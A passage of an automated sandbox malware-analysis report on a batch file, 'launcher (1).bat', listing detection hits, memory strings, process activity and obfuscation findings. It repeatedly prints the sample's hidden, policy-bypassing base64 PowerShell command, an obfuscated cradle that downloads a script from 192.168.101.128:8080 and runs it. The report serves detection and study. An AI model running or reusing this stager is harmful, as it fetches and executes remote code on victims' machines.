IAAgAC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwBFACcALAAnAEkAYQBiAGwAJwAsACcAUwBFAHQALQBWAGEAUgAnACkAIAAgACgAJwBUACcAKwAnADMAUwBaAFAAMQAnACkAIAAgACgAIABbAFQAeQBwAGUAXQAoACIAewAwAH0AewAxAH0AewAyAH0AewAzAH0AewA0AH0AIgAtAGYAJwBOACcALAAnAGUAVAAnACwAJwAuAEMAUgBlAGQARQBuAHQASQBhAEwAJwAsACcAYwAnACwAJwBBAEMAaABlACcAKQAgACAAKQAgADsAIAAgACgAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAHQAJwAsACcAYwAnACwAJwBOAGUAdwAtAE8AYgBqAGUAJwApACAAKAAiAHsAMgB9AHsAMwB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwB0ACcALAAnAG4AJwAsACcATgBlAHQAJwAsACcALgBXAGUAYgBDAGwAaQBlACcAKQApAC4AIgBQAFIATwBgAFgAeQAiAC4AIgBjAFIAZQBEAGAAZQBOAFQAaQBgAEEAYABsAHMAIgA9ACAAIAAoACAAIAAmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAaQB0ACcALAAnAGUATQAnACkAIAAgACgAIgBWAEEAUgBJAEEAYgAiACsAIgBMACIAKwAiAEUAOgBUACIAKwAiADMAcwB6AFAAIgArACIAMQAiACkAIAApAC4AIgB2AGEATABgAFUAZQAiADoAOgAiAGQAYABFAGYAYQBVAEwAdABuAEUAdABXAE8AUgBLAGAAYwBgAFIAZQBgAEQARQBuAHQASQBhAEwAUwAiADsAJgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHIAJwAsACcAaQB3ACcAKQAoACgAIgB7ADIAfQB7ADgAfQB7ADQAfQB7ADkAfQB7ADEAfQB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQAiAC0AZgAnAG8AYQBkAC8AcABvAHcAZQByACcALAAnAC4AMQAyACcALAAnAGgAdAB0AHAAOgAvAC8AJwAsACcAOAA6ADgAMAA4ADAALwAnACwAJwAyACcALAAnAHMAaABlAGwAbAAnACwAJwAvACcALAAnAGQAbwB3AG4AbAAnACwAJwAxADkAJwAsACcALgAxADYAOAAuADEAMAAxACcAKQApAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAfAAmACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHgAJwAsACcAaQBlACcAKQA=, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc IAAgAC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwBFACcALAAnAEkAYQBiAGwAJwAsACcAUwBFAHQALQBWAGEAUgAnACkAIAAgACgAJwBUACcAKwAnADMAUwBaAFAAMQAnACkAIAAgACgAIABbAFQAeQBwAGUAXQAoACIAewAwAH0AewAxAH0AewAyAH0AewAzAH0AewA0AH0AIgAtAGYAJwBOACcALAAnAGUAVAAnACwAJwAuAEMAUgBlAGQARQBuAHQASQBhAEwAJwAsACcAYwAnACwAJwBBAEMAaABlACcAKQAgACAAKQAgADsAIAAgACgAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAHQAJwAsACcAYwAnACwAJwBOAGUAdwAtAE8AYgBqAGUAJwApACAAKAAiAHsAMgB9AHsAMwB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwB0ACcALAAnAG4AJwAsACcATgBlAHQAJwAsACcALgBXAGUAYgBDAGwAaQBlACcAKQApAC4AIgBQAFIATwBgAFgAeQAiAC4AIgBjAFIAZQBEAGAAZQBOAFQAaQBgAEEAYABsAHMAIgA9ACAAIAAoACAAIAAmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAaQB0ACcALAAnAGUATQAnACkAIAAgACgAIgBWAEEAUgBJAEEAYgAiACsAIgBMACIAKwAiAEUAOgBUACIAKwAiADMAcwB6AFAAIgArACIAMQAiACkAIAApAC4AIgB2AGEATABgAFUAZQAiADoAOgAiAGQAYABFAGYAYQBVAEwAdABuAEUAdABXAE8AUgBLAGAAYwBgAFIAZQBgAEQARQBuAHQASQBhAEwAUwAiADsAJgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHIAJwAsACcAaQB3ACcAKQAoACgAIgB7ADIAfQB7ADgAfQB7ADQAfQB7ADkAfQB7ADEAfQB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQAiAC0AZgAnAG8AYQBkAC8AcABvAHcAZQByACcALAAnAC4AMQAyACcALAAnAGgAdAB0AHAAOgAvAC8AJwAsACcAOAA6ADgAMAA4ADAALwAnACwAJwAyACcALAAnAHMAaABlAGwAbAAnACwAJwAvACcALAAnAGQAbwB3AG4AbAAnACwAJwAxADkAJwAsACcALgAxADYAOAAuADEAMAAxACcAKQApAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAfAAmACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHgAJwAsACcAaQBlACcAKQA=, CommandLine: powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc IAAgAC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwBFACcALAAnAEkAYQBiAGwAJwAsACcAUwBFAHQALQBWAGEAUgAnACkAIAAgACgAJwBUACcAKwAnADMAUwBaAFAAMQAnACkAIAAgACgAIABbAFQAeQBwAGUAXQAoACIAewAwAH0AewAxAH0AewAyAH0AewAzAH0AewA0AH0AIgAtAGYAJwBOACcALAAnAGUAVAAnACwAJwAuAEMAUgBlAGQARQBuAHQASQBhAEwAJwAsACcAYwAnACwAJwBBAEMAaABlACcAKQAgACAAKQAgADsAIAAgACgAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAHQAJwAsACcAYwAnACwAJwBOAGUAdwAtAE8AYgBqAGUAJwApACAAKAAiAHsAMgB9AHsAMwB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwB0ACcALAAnAG4AJwAsACcATgBlAHQAJwAsACcALgBXAGUAYgBDAGwAaQBlACcAKQApAC4AIgBQAFIATwBgAFgAeQAiAC4AIgBjAFIAZQBEAGAAZQBOAFQAaQBgAEEAYABsAHMAIgA9ACAAIAAoACAAIAAmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAaQB0ACcALAAnAGUATQAnACkAIAAgACgAIgBWAEEAUgBJAEEAYgAiACsAIgBMACIAKwAiAEUAOgBUACIAKwAiADMAcwB6AFAAIgArACIAMQAiACkAIAApAC4AIgB2AGEATABgAFUAZQAiADoAOgAiAGQAYABFAGYAYQBVAEwAdABuAEUAdABXAE8AUgBLAGAAYwBgAFIAZQBgAEQARQBuAHQASQBhAEwAUwAiADsAJgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHIAJwAsACcAaQB3ACcAKQAoACgAIgB7ADIAfQB7ADgAfQB7ADQAfQB7ADkAfQB7ADEAfQB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQAiAC0AZgAnAG8AYQBkAC8AcABvAHcAZQByACcALAAnAC4AMQAyACcALAAnAGgAdAB0AHAAOgAvAC8AJwAsACcAOAA6ADgAMAA4ADAALwAnACwAJwAyACcALAAnAHMAaABlAGwAbAAnACwAJwAvACcALAAnAGQAbwB3AG4AbAAnACwAJwAxADkAJwAsACcALgAxADYAOAAuADEAMAAxACcAKQApAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAfAAmACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHgAJwAsACcAaQBlACcAKQA=, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,

    Suricata Signatures

    No Suricata rule has matched

    Joe Sandbox Signatures

    • AV Detection
    • Compliance
    • Networking
    • System Summary
    • Data Obfuscation
    • Hooking and other Techniques for Hiding and Protection
    • Malware Analysis System Evasion
    • Anti Debugging
    • HIPS / PFW / Operating System Protection Evasion
    • Language, Device and Operating System Detection

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: Submited SampleNeural Call Log Analysis: 87.1%
    Source: Binary string: softy.pdb source: powershell.exe, 00000002.00000002.1511357339.00000223BDCD7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: tomation.pdb source: powershell.exe, 00000002.00000002.1511357339.00000223BDD33000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1512483621.00000223BDF0C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: m.pdbpdbtem.pdb source: powershell.exe, 00000002.00000002.1511357339.00000223BDD33000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbp$ source: powershell.exe, 00000002.00000002.1511357339.00000223BDD33000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000002.00000002.1512483621.00000223BDF0C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1511357339.00000223BDD33000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000002.00000002.1512483621.00000223BDEC2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Q.pdb;/T:- source: powershell.exe, 00000002.00000002.1511357339.00000223BDD33000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.1511357339.00000223BDC80000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1512483621.00000223BDEC2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbvice source: powershell.exe, 00000002.00000002.1511357339.00000223BDCD7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbB$ source: powershell.exe, 00000002.00000002.1511357339.00000223BDD33000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.pdb source: powershell.exe, 00000002.00000002.1512483621.00000223BDF0C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1512483621.00000223BDEC2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: soft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000002.00000002.1512483621.00000223BDF0C000.00000004.00000020.00020000.00000000.sdmp
    Source: powershell.exe, 00000002.00000002.1494598884.00000223A7150000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.168.101.128:8080
    Source: powershell.exe, 00000002.00000002.1494598884.00000223A7150000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.168.101.128:8080/download/powershell/
    Source: powershell.exe, 00000002.00000002.1507627224.00000223B5C56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1507627224.00000223B5B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000002.00000002.1494598884.00000223A5CD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000002.00000002.1494598884.00000223A5AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000002.00000002.1494598884.00000223A5CD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000002.00000002.1494598884.00000223A5AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
    Source: powershell.exe, 00000002.00000002.1507627224.00000223B5B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000002.00000002.1507627224.00000223B5B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000002.00000002.1507627224.00000223B5B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000002.00000002.1494598884.00000223A5CD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000002.00000002.1494598884.00000223A6C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
    Source: powershell.exe, 00000002.00000002.1507627224.00000223B5C56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1507627224.00000223B5B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: classification engineClassification label: mal68.evad.winBAT@4/5@0/1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8012:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ac0leksk.bvs.ps1Jump to behavior
    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\launcher (1).bat" "
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\launcher (1).bat" "
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc IAAgAC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwBFACcALAAnAEkAYQBiAGwAJwAsACcAUwBFAHQALQBWAGEAUgAnACkAIAAgACgAJwBUACcAKwAnADMAUwBaAFAAMQAnACkAIAAgACgAIABbAFQAeQBwAGUAXQAoACIAewAwAH0AewAxAH0AewAyAH0AewAzAH0AewA0AH0AIgAtAGYAJwBOACcALAAnAGUAVAAnACwAJwAuAEMAUgBlAGQARQBuAHQASQBhAEwAJwAsACcAYwAnACwAJwBBAEMAaABlACcAKQAgACAAKQAgADsAIAAgACgAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAHQAJwAsACcAYwAnACwAJwBOAGUAdwAtAE8AYgBqAGUAJwApACAAKAAiAHsAMgB9AHsAMwB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwB0ACcALAAnAG4AJwAsACcATgBlAHQAJwAsACcALgBXAGUAYgBDAGwAaQBlACcAKQApAC4AIgBQAFIATwBgAFgAeQAiAC4AIgBjAFIAZQBEAGAAZQBOAFQAaQBgAEEAYABsAHMAIgA9ACAAIAAoACAAIAAmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAaQB0ACcALAAnAGUATQAnACkAIAAgACgAIgBWAEEAUgBJAEEAYgAiACsAIgBMACIAKwAiAEUAOgBUACIAKwAiADMAcwB6AFAAIgArACIAMQAiACkAIAApAC4AIgB2AGEATABgAFUAZQAiADoAOgAiAGQAYABFAGYAYQBVAEwAdABuAEUAdABXAE8AUgBLAGAAYwBgAFIAZQBgAEQARQBuAHQASQBhAEwAUwAiADsAJgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHIAJwAsACcAaQB3ACcAKQAoACgAIgB7ADIAfQB7ADgAfQB7ADQAfQB7ADkAfQB7ADEAfQB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQAiAC0AZgAnAG8AYQBkAC8AcABvAHcAZQByACcALAAnAC4AMQAyACcALAAnAGgAdAB0AHAAOgAvAC8AJwAsACcAOAA6ADgAMAA4ADAALwAnACwAJwAyACcALAAnAHMAaABlAGwAbAAnACwAJwAvACcALAAnAGQAbwB3AG4AbAAnACwAJwAxADkAJwAsACcALgAxADYAOAAuADEAMAAxACcAKQApAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAfAAmACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHgAJwAsACcAaQBlACcAKQA=
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc IAAgAC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwBFACcALAAnAEkAYQBiAGwAJwAsACcAUwBFAHQALQBWAGEAUgAnACkAIAAgACgAJwBUACcAKwAnADMAUwBaAFAAMQAnACkAIAAgACgAIABbAFQAeQBwAGUAXQAoACIAewAwAH0AewAxAH0AewAyAH0AewAzAH0AewA0AH0AIgAtAGYAJwBOACcALAAnAGUAVAAnACwAJwAuAEMAUgBlAGQARQBuAHQASQBhAEwAJwAsACcAYwAnACwAJwBBAEMAaABlACcAKQAgACAAKQAgADsAIAAgACgAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAHQAJwAsACcAYwAnACwAJwBOAGUAdwAtAE8AYgBqAGUAJwApACAAKAAiAHsAMgB9AHsAMwB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwB0ACcALAAnAG4AJwAsACcATgBlAHQAJwAsACcALgBXAGUAYgBDAGwAaQBlACcAKQApAC4AIgBQAFIATwBgAFgAeQAiAC4AIgBjAFIAZQBEAGAAZQBOAFQAaQBgAEEAYABsAHMAIgA9ACAAIAAoACAAIAAmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAaQB0ACcALAAnAGUATQAnACkAIAAgACgAIgBWAEEAUgBJAEEAYgAiACsAIgBMACIAKwAiAEUAOgBUACIAKwAiADMAcwB6AFAAIgArACIAMQAiACkAIAApAC4AIgB2AGEATABgAFUAZQAiADoAOgAiAGQAYABFAGYAYQBVAEwAdABuAEUAdABXAE8AUgBLAGAAYwBgAFIAZQBgAEQARQBuAHQASQBhAEwAUwAiADsAJgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHIAJwAsACcAaQB3ACcAKQAoACgAIgB7ADIAfQB7ADgAfQB7ADQAfQB7ADkAfQB7ADEAfQB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQAiAC0AZgAnAG8AYQBkAC8AcABvAHcAZQByACcALAAnAC4AMQAyACcALAAnAGgAdAB0AHAAOgAvAC8AJwAsACcAOAA6ADgAMAA4ADAALwAnACwAJwAyACcALAAnAHMAaABlAGwAbAAnACwAJwAvACcALAAnAGQAbwB3AG4AbAAnACwAJwAxADkAJwAsACcALgAxADYAOAAuADEAMAAxACcAKQApAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAfAAmACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHgAJwAsACcAaQBlACcAKQA=Jump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: Binary string: softy.pdb source: powershell.exe, 00000002.00000002.1511357339.00000223BDCD7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: tomation.pdb source: powershell.exe, 00000002.00000002.1511357339.00000223BDD33000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1512483621.00000223BDF0C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: m.pdbpdbtem.pdb source: powershell.exe, 00000002.00000002.1511357339.00000223BDD33000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbp$ source: powershell.exe, 00000002.00000002.1511357339.00000223BDD33000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000002.00000002.1512483621.00000223BDF0C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1511357339.00000223BDD33000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000002.00000002.1512483621.00000223BDEC2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Q.pdb;/T:- source: powershell.exe, 00000002.00000002.1511357339.00000223BDD33000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.1511357339.00000223BDC80000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1512483621.00000223BDEC2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbvice source: powershell.exe, 00000002.00000002.1511357339.00000223BDCD7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbB$ source: powershell.exe, 00000002.00000002.1511357339.00000223BDD33000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.pdb source: powershell.exe, 00000002.00000002.1512483621.00000223BDF0C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1512483621.00000223BDEC2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: soft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000002.00000002.1512483621.00000223BDF0C000.00000004.00000020.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc IAAgAC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwBFACcALAAnAEkAYQBiAGwAJwAsACcAUwBFAHQALQBWAGEAUgAnACkAIAAgACgAJwBUACcAKwAnADMAUwBaAFAAMQAnACkAIAAgACgAIABbAFQAeQBwAGUAXQAoACIAewAwAH0AewAxAH0AewAyAH0AewAzAH0AewA0AH0AIgAtAGYAJwBOACcALAAnAGUAVAAnACwAJwAuAEMAUgBlAGQARQBuAHQASQBhAEwAJwAsACcAYwAnACwAJwBBAEMAaABlACcAKQAgACAAKQAgADsAIAAgACgAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAHQAJwAsACcAYwAnACwAJwBOAGUAdwAtAE8AYgBqAGUAJwApACAAKAAiAHsAMgB9AHsAMwB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwB0ACcALAAnAG4AJwAsACcATgBlAHQAJwAsACcALgBXAGUAYgBDAGwAaQBlACcAKQApAC4AIgBQAFIATwBgAFgAeQAiAC4AIgBjAFIAZQBEAGAAZQBOAFQAaQBgAEEAYABsAHMAIgA9ACAAIAAoACAAIAAmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAaQB0ACcALAAnAGUATQAnACkAIAAgACgAIgBWAEEAUgBJAEEAYgAiACsAIgBMACIAKwAiAEUAOgBUACIAKwAiADMAcwB6AFAAIgArACIAMQAiACkAIAApAC4AIgB2AGEATABgAFUAZQAiADoAOgAiAGQAYABFAGYAYQBVAEwAdABuAEUAdABXAE8AUgBLAGAAYwBgAFIAZQBgAEQARQBuAHQASQBhAEwAUwAiADsAJgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHIAJwAsACcAaQB3ACcAKQAoACgAIgB7ADIAfQB7ADgAfQB7ADQAfQB7ADkAfQB7ADEAfQB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQAiAC0AZgAnAG8AYQBkAC8AcABvAHcAZQByACcALAAnAC4AMQAyACcALAAnAGgAdAB0AHAAOgAvAC8AJwAsACcAOAA6ADgAMAA4ADAALwAnACwAJwAyACcALAAnAHMAaABlAGwAbAAnACwAJwAvACcALAAnAGQAbwB3AG4A